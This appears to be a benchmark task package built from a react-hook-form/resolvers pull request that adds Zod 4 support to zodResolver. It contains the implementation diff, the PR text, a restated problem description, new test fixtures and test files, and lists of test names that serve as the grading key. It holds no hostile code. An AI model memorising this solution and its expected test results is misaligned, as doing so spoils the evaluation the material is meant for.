z4.$ZodType<Output, Input>, + schemaOptions: Zod4ParseParams | undefined, // already partial + resolverOptions: RawResolverOptions, +): Resolver<z4.input<T>, Context, z4.input<T>>; /** * Creates a resolver function for react-hook-form that validates form data using a Zod schema - * @param {z.ZodSchema<Input>} schema - The Zod schema used to validate the form data - * @param {Partial<z.ParseParams>} [schemaOptions] - Optional configuration options for Zod parsing + * @param {z3.ZodSchema<Input>} schema - The Zod schema used to validate the form data + * @param {Partial<z3.ParseParams>} [schemaOptions] - Optional configuration options for Zod parsing * @param {Object} [resolverOptions] - Optional resolver-specific configuration * @param {('async'|'sync')} [resolverOptions.mode='async'] - Validation mode. Use 'sync' for synchronous validation * @param {boolean} [resolverOptions.raw=false] - If true, returns the raw form values instead of the parsed data - * @returns {Resolver<z.output<typeof schema>>} A resolver function compatible with react-hook-form + * @returns {Resolver<z3.output<typeof schema>>} A resolver function compatible with react-hook-form * @throws {Error} Throws if validation fails with a non-Zod error * @example - * const schema = z.object({ - * name: z.string().min(2), - * age: z.number().min(18) + * const schema = z3.object({ + * name: z3.string().min(2), + * age: z3.number().min(18) * }); * * useForm({ @@ -101,41 +236,80 @@ export function zodResolver<Input extends FieldValues, Context, Output>( * }); */ export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions?: Partial<z.ParseParams>, + schema: object, + schemaOptions?: object, resolverOptions: { mode?: 'async' | 'sync'; raw?: boolean; } = {}, ): Resolver<Input, Context, Output | Input> { - return async (values: Input, _, options) => { - try { - const data = await schema[ - resolverOptions.mode === 'sync' ? 
'parse' : 'parseAsync' - ](values, schemaOptions); - - options.shouldUseNativeValidation && validateFieldsNatively({}, options); - - return { - errors: {} as FieldErrors, - values: resolverOptions.raw ? Object.assign({}, values) : data, - } satisfies ResolverSuccess<Output | Input>; - } catch (error) { - if (isZodError(error)) { + if (isZod3Schema(schema)) { + return async (values: Input, _, options) => { + try { + const data = await schema[ + resolverOptions.mode === 'sync' ? 'parse' : 'parseAsync' + ](values, schemaOptions); + + options.shouldUseNativeValidation && + validateFieldsNatively({}, options); + return { - values: {}, - errors: toNestErrors( - parseErrorSchema( - error.errors, - !options.shouldUseNativeValidation && - options.criteriaMode === 'all', + errors: {} as FieldErrors, + values: resolverOptions.raw ? Object.assign({}, values) : data, + } satisfies ResolverSuccess<Output | Input>; + } catch (error) { + if (isZod3Error(error)) { + return { + values: {}, + errors: toNestErrors( + parseZod3Issues( + error.errors, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, ), - options, - ), - } satisfies ResolverError<Input>; + } satisfies ResolverError<Input>; + } + + throw error; } + }; + } - throw error; - } - }; + if (isZod4Schema(schema)) { + return async (values: Input, _, options) => { + try { + const parseFn = + resolverOptions.mode === 'sync' ? z4.parse : z4.parseAsync; + const data: any = await parseFn(schema, values, schemaOptions); + + options.shouldUseNativeValidation && + validateFieldsNatively({}, options); + + return { + errors: {} as FieldErrors, + values: resolverOptions.raw ? 
Object.assign({}, values) : data, + } satisfies ResolverSuccess<Output | Input>; + } catch (error) { + if (isZod4Error(error)) { + return { + values: {}, + errors: toNestErrors( + parseZod4Issues( + error.issues, + !options.shouldUseNativeValidation && + options.criteriaMode === 'all', + ), + options, + ), + } satisfies ResolverError<Input>; + } + + throw error; + } + }; + } + + throw new Error('Invalid input: not a Zod schema'); }
feat: support Zod 4 Per some discussions I've been having with @bluebill1049, this PR adds support for Zod 4. The other PR by @alexcraviotto (https://github.com/react-hook-form/resolvers/pull/776) is really solid but we decided to go another direction. - This PR bumps the minimum Zod version to `3.25.0` - With this change, it;s possible to support both Zod 3 and Zod 4 in a single `zodResolver` (via Zod's [subpath versioning](https://github.com/colinhacks/zod/issues/4371) scheme) - I've designed this to continue working with Zod versions pre-3.25.0, but it's on a best-effort basis. For instance, you won't get perfect type signatures on parse params (the second argument to `zodResolver`). There were zero breaking changes between Zod 3.24 and Zod 3.25 so there's no reason not to upgrade. Both Zod 3 and Zod 4 schemas can be passed into `zodResolver()`: ```ts import { zodResolver } from "@hookform/resolvers"; import * as z3 from "zod/v3"; // or just "zod" import * as z4 from "zod/v4"; const oldResolver = zodResolver(z3.object({ name: z.string() })); const newResolver = zodResolver(z4.object({ name: z.string() })); ```
**Title** Add Zod 4 compatibility to the Zod resolver **Problem** The resolver currently only supports Zod 3, so projects that upgrade to Zod 4 lose the ability to use `zodResolver`. The documentation and package metadata also reference the older Zod repository and version range, which can mislead users. **Root Cause** The resolver’s implementation and type signatures are tightly coupled to Zod 3’s error format, parsing API, and module path, and the package’s peer‑dependency pins an older Zod version. **Fix / Expected Behavior** - Update documentation to show that either the default Zod import or the `zod/v4` sub‑path can be used with the resolver. - Bump the Zod peer‑dependency to a version that includes the 3.25.0‑plus range, enabling the sub‑path versioning scheme. - Add runtime detection of the Zod major version and route validation through the appropriate parsing and error‑handling logic for both Zod 3 and Zod 4. - Provide overloads so TypeScript infers the correct input and output types regardless of the Zod version used. - Adjust the repository lockfile and README link to point to the official Zod repository. **Risk & Validation** - Ensure that existing projects using Zod 3 continue to receive correct type inference and error messages (fallback logic is exercised for versions < 3.25.0). - Verify that schemas built with Zod 4 are parsed correctly and that native validation still respects the resolver options. - Run the full test suite and add basic integration tests for both Zod 3 and Zod 4 schemas to catch any version‑detection regressions.
777
react-hook-form/resolvers
diff --git a/standard-schema/src/__tests__/__fixtures__/data.ts b/standard-schema/src/__tests__/__fixtures__/data.ts index fc72250..7236799 100644 --- a/standard-schema/src/__tests__/__fixtures__/data.ts +++ b/standard-schema/src/__tests__/__fixtures__/data.ts @@ -1,6 +1,6 @@ import { StandardSchemaV1 } from '@standard-schema/spec'; import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/standard-schema/src/__tests__/standard-schema.ts b/standard-schema/src/__tests__/standard-schema.ts index b5c5391..b3c319d 100644 --- a/standard-schema/src/__tests__/standard-schema.ts +++ b/standard-schema/src/__tests__/standard-schema.ts @@ -1,5 +1,5 @@ import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { standardSchemaResolver } from '..'; import { customSchema, diff --git a/typebox/src/__tests__/typebox.ts b/typebox/src/__tests__/typebox.ts index 0085949..7fb7dfa 100644 --- a/typebox/src/__tests__/typebox.ts +++ b/typebox/src/__tests__/typebox.ts @@ -1,8 +1,8 @@ +import { Type } from '@sinclair/typebox'; +import { TypeCompiler } from '@sinclair/typebox/compiler'; import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; import { typeboxResolver } from '..'; import { fields, invalidData, schema, validData } from './__fixtures__/data'; -import { Type } from '@sinclair/typebox'; -import { TypeCompiler } from '@sinclair/typebox/compiler'; const shouldUseNativeValidation = false; diff --git a/typeschema/src/__tests__/Form-native-validation.tsx b/typeschema/src/__tests__/Form-native-validation.tsx index a1b8732..55c70bb 100644 --- a/typeschema/src/__tests__/Form-native-validation.tsx +++ b/typeschema/src/__tests__/Form-native-validation.tsx @@ -3,7 +3,7 @@ import user from '@testing-library/user-event'; import type { Infer } from '@typeschema/main'; import React from 'react'; import { useForm 
} from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; const USERNAME_REQUIRED_MESSAGE = 'username field is required'; diff --git a/typeschema/src/__tests__/Form.tsx b/typeschema/src/__tests__/Form.tsx index 173e799..51312a6 100644 --- a/typeschema/src/__tests__/Form.tsx +++ b/typeschema/src/__tests__/Form.tsx @@ -3,7 +3,7 @@ import user from '@testing-library/user-event'; import type { Infer } from '@typeschema/main'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; const schema = z.object({ diff --git a/typeschema/src/__tests__/__fixtures__/data.ts b/typeschema/src/__tests__/__fixtures__/data.ts index 3131067..d206eee 100644 --- a/typeschema/src/__tests__/__fixtures__/data.ts +++ b/typeschema/src/__tests__/__fixtures__/data.ts @@ -1,5 +1,5 @@ import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/typeschema/src/__tests__/typeschema.ts b/typeschema/src/__tests__/typeschema.ts index 5261fbd..a60ab07 100644 --- a/typeschema/src/__tests__/typeschema.ts +++ b/typeschema/src/__tests__/typeschema.ts @@ -1,6 +1,6 @@ import * as typeschema from '@typeschema/main'; import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { typeschemaResolver } from '..'; import { fields, invalidData, schema, validData } from './__fixtures__/data'; diff --git a/zod/src/__tests__/Form-native-validation.tsx b/zod/src/__tests__/Form-native-validation.tsx index 3ac296f..68957de 100644 --- a/zod/src/__tests__/Form-native-validation.tsx +++ b/zod/src/__tests__/Form-native-validation.tsx @@ -2,7 +2,7 @@ import { render, screen } from '@testing-library/react'; import user from '@testing-library/user-event'; import React from 'react'; import 
{ useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { zodResolver } from '..'; const USERNAME_REQUIRED_MESSAGE = 'username field is required'; diff --git a/zod/src/__tests__/Form.tsx b/zod/src/__tests__/Form.tsx index ad78b48..d766924 100644 --- a/zod/src/__tests__/Form.tsx +++ b/zod/src/__tests__/Form.tsx @@ -2,7 +2,7 @@ import { render, screen } from '@testing-library/react'; import user from '@testing-library/user-event'; import React from 'react'; import { useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; import { zodResolver } from '..'; const schema = z.object({ diff --git a/zod/src/__tests__/__fixtures__/data.ts b/zod/src/__tests__/__fixtures__/data-v3.ts similarity index 98% rename from zod/src/__tests__/__fixtures__/data.ts rename to zod/src/__tests__/__fixtures__/data-v3.ts index f338f1d..4904ce2 100644 --- a/zod/src/__tests__/__fixtures__/data.ts +++ b/zod/src/__tests__/__fixtures__/data-v3.ts @@ -1,5 +1,5 @@ import { Field, InternalFieldName } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v3'; export const schema = z .object({ diff --git a/zod/src/__tests__/__fixtures__/data-v4-mini.ts b/zod/src/__tests__/__fixtures__/data-v4-mini.ts new file mode 100644 index 0000000..11bab77 --- /dev/null +++ b/zod/src/__tests__/__fixtures__/data-v4-mini.ts @@ -0,0 +1,98 @@ +import { Field, InternalFieldName } from 'react-hook-form'; +import { z } from 'zod/v4-mini'; + +export const schema = z + .object({ + username: z + .string() + .check(z.regex(/^\w+$/), z.minLength(3), z.maxLength(30)), + password: z + .string() + .check( + z.regex(new RegExp('.*[A-Z].*'), 'One uppercase character'), + z.regex(new RegExp('.*[a-z].*'), 'One lowercase character'), + z.regex(new RegExp('.*\\d.*'), 'One number'), + z.regex( + new RegExp('.*[`~<>?,./!@#$%^&*()\\-_+="\'|{}\\[\\];:\\\\].*'), + 'One special character', + ), + z.minLength(8, 'Must be at least 8 characters in 
length'), + ), + repeatPassword: z.string(), + accessToken: z.union([z.string(), z.number()]), + birthYear: z.optional(z.number().check(z.minimum(1900), z.maximum(2013))), + email: z.optional(z.email()), + tags: z.array(z.string()), + enabled: z.boolean(), + url: z.union([z.url('Custom error url'), z.literal('')]), + like: z.optional( + z.array( + z.object({ + id: z.number(), + name: z.string().check(z.length(4)), + }), + ), + ), + dateStr: z + .pipe( + z.string(), + z.transform((value) => new Date(value)), + ) + .check( + z.refine((value) => !isNaN(value.getTime()), { + message: 'Invalid date', + }), + ), + }) + .check( + z.refine((obj) => obj.password === obj.repeatPassword, { + message: 'Passwords do not match', + path: ['confirm'], + }), + ); + +export const validData = { + username: 'Doe', + password: 'Password123_', + repeatPassword: 'Password123_', + birthYear: 2000, + email: 'john@doe.com', + tags: ['tag1', 'tag2'], + enabled: true, + accessToken: 'accessToken', + url: 'https://react-hook-form.com/', + like: [ + { + id: 1, + name: 'name', + }, + ], + dateStr: '2020-01-01', +} satisfies z.input<typeof schema>; + +export const invalidData = { + password: '___', + email: '', + birthYear: 'birthYear', + like: [{ id: 'z' }], + url: 'abc', +} as unknown as z.input<typeof schema>; + +export const fields: Record<InternalFieldName, Field['_f']> = { + username: { + ref: { name: 'username' }, + name: 'username', + }, + password: { + ref: { name: 'password' }, + name: 'password', + }, + email: { + ref: { name: 'email' }, + name: 'email', + }, + birthday: { + ref: { name: 'birthday' }, + name: 'birthday', + }, +}; diff --git a/zod/src/__tests__/__fixtures__/data-v4.ts b/zod/src/__tests__/__fixtures__/data-v4.ts new file mode 100644 index 0000000..7c6f55f --- /dev/null +++ b/zod/src/__tests__/__fixtures__/data-v4.ts @@ -0,0 +1,89 @@ +import { Field, InternalFieldName } from 'react-hook-form'; +import { z } from 'zod/v4'; + +export const schema = z + .object({ + username: 
z.string().regex(/^\w+$/).min(3).max(30), + password: z + .string() + .regex(new RegExp('.*[A-Z].*'), 'One uppercase character') + .regex(new RegExp('.*[a-z].*'), 'One lowercase character') + .regex(new RegExp('.*\\d.*'), 'One number') + .regex( + new RegExp('.*[`~<>?,./!@#$%^&*()\\-_+="\'|{}\\[\\];:\\\\].*'), + 'One special character', + ) + .min(8, 'Must be at least 8 characters in length'), + repeatPassword: z.string(), + accessToken: z.union([z.string(), z.number()]), + birthYear: z.number().min(1900).max(2013).optional(), + email: z.string().email().optional(), + tags: z.array(z.string()), + + enabled: z.boolean(), + url: z.string().url('Custom error url').or(z.literal('')), + like: z + .array( + z.object({ + id: z.number(), + name: z.string().length(4), + }), + ) + .optional(), + dateStr: z + .string() + .transform((value) => new Date(value)) + .refine((value) => !isNaN(value.getTime()), { + message: 'Invalid date', + }), + }) + .refine((obj) => obj.password === obj.repeatPassword, { + message: 'Passwords do not match', + path: ['confirm'], + }); + +export const validData = { + username: 'Doe', + password: 'Password123_', + repeatPassword: 'Password123_', + birthYear: 2000, + email: 'john@doe.com', + tags: ['tag1', 'tag2'], + enabled: true, + accessToken: 'accessToken', + url: 'https://react-hook-form.com/', + like: [ + { + id: 1, + name: 'name', + }, + ], + dateStr: '2020-01-01', +} satisfies z.input<typeof schema>; + +export const invalidData = { + password: '___', + email: '', + birthYear: 'birthYear', + like: [{ id: 'z' }], + url: 'abc', +} as unknown as z.input<typeof schema>; + +export const fields: Record<InternalFieldName, Field['_f']> = { + username: { + ref: { name: 'username' }, + name: 'username', + }, + password: { + ref: { name: 'password' }, + name: 'password', + }, + email: { + ref: { name: 'email' }, + name: 'email', + }, + birthday: { + ref: { name: 'birthday' }, + name: 'birthday', + }, +}; diff --git a/zod/src/__tests__/zod-v3.ts 
b/zod/src/__tests__/zod-v3.ts new file mode 100644 index 0000000..8e040ba --- /dev/null +++ b/zod/src/__tests__/zod-v3.ts @@ -0,0 +1,178 @@ +import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; +import { z } from 'zod/v3'; +import { zodResolver } from '..'; +import { fields, invalidData, schema, validData } from './__fixtures__/data-v3'; + +const shouldUseNativeValidation = false; + +describe('zodResolver', () => { + it('should return values from zodResolver when validation pass & raw=true', async () => { + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(parseAsyncSpy).toHaveBeenCalledTimes(1); + expect(result).toEqual({ errors: {}, values: validData }); + }); + + it('should return parsed values from zodResolver with `mode: sync` when validation pass', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver when validation fails', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver with `mode: sync` when validation fails', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + 
expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`', async () => { + const result = await zodResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); + + it('should throw any error unrelated to Zod', async () => { + const schemaWithCustomError = schema.refine(() => { + throw Error('custom error'); + }); + const promise = zodResolver(schemaWithCustomError)(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + await expect(promise).rejects.toThrow('custom error'); + }); + + it('should enforce parse params type signature', async () => { + const resolver = zodResolver(schema, { + async: true, + path: ['asdf', 1234], + errorMap(iss, ctx) { + iss.path; + iss.code; + iss.path; + ctx.data; + ctx.defaultError; + return { message: 'asdf' }; + }, + }); + + resolver; + }); + + /** + * Type inference tests + */ + it('should correctly infer the output type from a zod schema', () => { + const resolver = zodResolver(z.object({ id: z.number() })); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: number }> + >(); + }); + + it('should correctly infer the output type from a zod schema using a transform', () => { + const resolver = zodResolver( + z.object({ id: z.number().transform((val) => String(val)) }), + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: 
number }, unknown, { id: string }> + >(); + }); + + it('should correctly infer the output type from a zod schema when a different input type is specified', () => { + const schema = z.object({ id: z.number() }).transform(({ id }) => { + return { id: String(id) }; + }); + + const resolver = zodResolver<{ id: number }, any, z.output<typeof schema>>( + schema, + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, any, { id: string }> + >(); + }); + + it('should correctly infer the output type from a Zod schema for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number() }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: number; + }> + >(); + }); + + it('should correctly infer the output type from a Zod schema with a transform for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number().transform((val) => String(val)) }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: string; + }> + >(); + }); +}); diff --git a/zod/src/__tests__/zod-v4-mini.ts b/zod/src/__tests__/zod-v4-mini.ts new file mode 100644 index 0000000..54c5681 --- /dev/null +++ b/zod/src/__tests__/zod-v4-mini.ts @@ -0,0 +1,182 @@ +import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; +import { z } from 'zod/v4-mini'; +import { zodResolver } from '..'; +import { + fields, + invalidData, + schema, + validData, +} from './__fixtures__/data-v4-mini'; + +const shouldUseNativeValidation = false; + +describe('zodResolver', () => { + it('should return values from zodResolver when validation pass & raw=true', async () => { + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const 
result = await zodResolver(schema, undefined, { + raw: true, + })(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + result; + + expect(parseAsyncSpy).toHaveBeenCalledTimes(1); + expect(result).toEqual({ errors: {}, values: validData }); + expectTypeOf(result.values); + }); + + it('should return parsed values from zodResolver with `mode: sync` when validation pass', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(validData, undefined, { fields, shouldUseNativeValidation }); + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result.errors).toEqual({}); + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver when validation fails', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return a single error from zodResolver with `mode: sync` when validation fails', async () => { + const parseSpy = vi.spyOn(schema, 'parse'); + const parseAsyncSpy = vi.spyOn(schema, 'parseAsync'); + + const result = await zodResolver(schema, undefined, { + mode: 'sync', + })(invalidData, undefined, { fields, shouldUseNativeValidation }); + + expect(parseSpy).toHaveBeenCalledTimes(1); + expect(parseAsyncSpy).not.toHaveBeenCalled(); + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true', async () => { + const result = await zodResolver(schema)(invalidData, undefined, { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }); + + expect(result).toMatchSnapshot(); + }); + + it('should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true 
and `mode: sync`', async () => { + const result = await zodResolver(schema, undefined, { mode: 'sync' })( + invalidData, + undefined, + { + fields, + criteriaMode: 'all', + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); + + it('should throw any error unrelated to Zod', async () => { + const schemaWithCustomError = schema.check( + z.refine(() => { + throw Error('custom error'); + }), + ); + const promise = zodResolver(schemaWithCustomError)(validData, undefined, { + fields, + shouldUseNativeValidation, + }); + + await expect(promise).rejects.toThrow('custom error'); + }); + + /** + * Type inference tests + */ + it('should correctly infer the output type from a zod schema', () => { + const resolver = zodResolver(z.object({ id: z.number() })); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: number }> + >(); + }); + + it('should correctly infer the output type from a zod schema using a transform', () => { + const resolver = zodResolver( + z.object({ + id: z.pipe( + z.number(), + z.transform((val) => String(val)), + ), + }), + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, unknown, { id: string }> + >(); + }); + + it('should correctly infer the output type from a zod schema when a different input type is specified', () => { + const schema = z.pipe( + z.object({ id: z.number() }), + z.transform(({ id }) => { + return { id: String(id) }; + }), + ); + + const resolver = zodResolver<{ id: number }, any, z.output<typeof schema>>( + schema, + ); + + expectTypeOf(resolver).toEqualTypeOf< + Resolver<{ id: number }, any, { id: string }> + >(); + }); + + it('should correctly infer the output type from a Zod schema for the handleSubmit function in useForm', () => { + const schema = z.object({ id: z.number() }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + 
expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: number; + }> + >(); + }); + + it('should correctly infer the output type from a Zod schema with a transform for the handleSubmit function in useForm', () => { + const schema = z.object({ + id: z.pipe( + z.number(), + z.transform((val) => String(val)), + ), + }); + + const form = useForm({ + resolver: zodResolver(schema), + }); + + expectTypeOf(form.watch('id')).toEqualTypeOf<number>(); + + expectTypeOf(form.handleSubmit).parameter(0).toEqualTypeOf< + SubmitHandler<{ + id: string; + }> + >(); + }); +}); diff --git a/zod/src/__tests__/zod.ts b/zod/src/__tests__/zod-v4.ts similarity index 93% rename from zod/src/__tests__/zod.ts rename to zod/src/__tests__/zod-v4.ts index 4b2f75b..0a043bc 100644 --- a/zod/src/__tests__/zod.ts +++ b/zod/src/__tests__/zod-v4.ts @@ -1,7 +1,7 @@ import { Resolver, SubmitHandler, useForm } from 'react-hook-form'; -import { z } from 'zod'; +import { z } from 'zod/v4'; import { zodResolver } from '..'; -import { fields, invalidData, schema, validData } from './__fixtures__/data'; +import { fields, invalidData, schema, validData } from './__fixtures__/data-v4'; const shouldUseNativeValidation = false; @@ -92,6 +92,21 @@ describe('zodResolver', () => { await expect(promise).rejects.toThrow('custom error'); }); + it('should enforce parse params type signature', async () => { + const resolver = zodResolver(schema, { + jitless: true, + reportInput: true, + error(iss) { + iss.path; + iss.code; + iss.path; + return { message: 'asdf' }; + }, + }); + + resolver; + }); + /** * Type inference tests */
[ "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod-v4.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod-v4.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod-v4.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`" ]
[ "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "typanion/src/__tests__/typanion.ts > typanionResolver > should correctly infer the output type from a typanion schema", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v4-mini.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return values from standardSchemaResolver when validation pass", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return a single error from standardSchemaResolver when validation fails", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return all the errors from standardSchemaResolver when validation fails with `validateAllFieldCriteria` set to true", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should return values from standardSchemaResolver when validation pass & raw=true", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly handle path segments that are objects", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema", "standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema using a transform", 
"standard-schema/src/__tests__/standard-schema.ts > standardSchemaResolver > should correctly infer the output type from a standardSchema schema when a different input type is specified", "zod/src/__tests__/zod-v4.ts > zodResolver > should throw any error unrelated to Zod", "zod/src/__tests__/zod-v4.ts > zodResolver > should enforce parse params type signature", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema using a transform", "zod/src/__tests__/zod-v4.ts > zodResolver > should correctly infer the output type from a zod schema when a different input type is specified", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass", "vine/src/__tests__/vine.ts > vineResolver > should return a single error from vineResolver when validation fails", "vine/src/__tests__/vine.ts > vineResolver > should return all the errors from vineResolver when validation fails with `validateAllFieldCriteria` set to true", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass & raw=true", "vine/src/__tests__/vine.ts > vineResolver > should correctly infer the output type from a vine schema", "vine/src/__tests__/vine.ts > vineResolver > should correctly infer the output type from a vine schema using a transform", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should correctly infer the output type from 
a superstruct schema", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should correctly infer the output type from a computedTypes schema", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should correctly infer the output type from a computedTypes schema using a transform", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", 
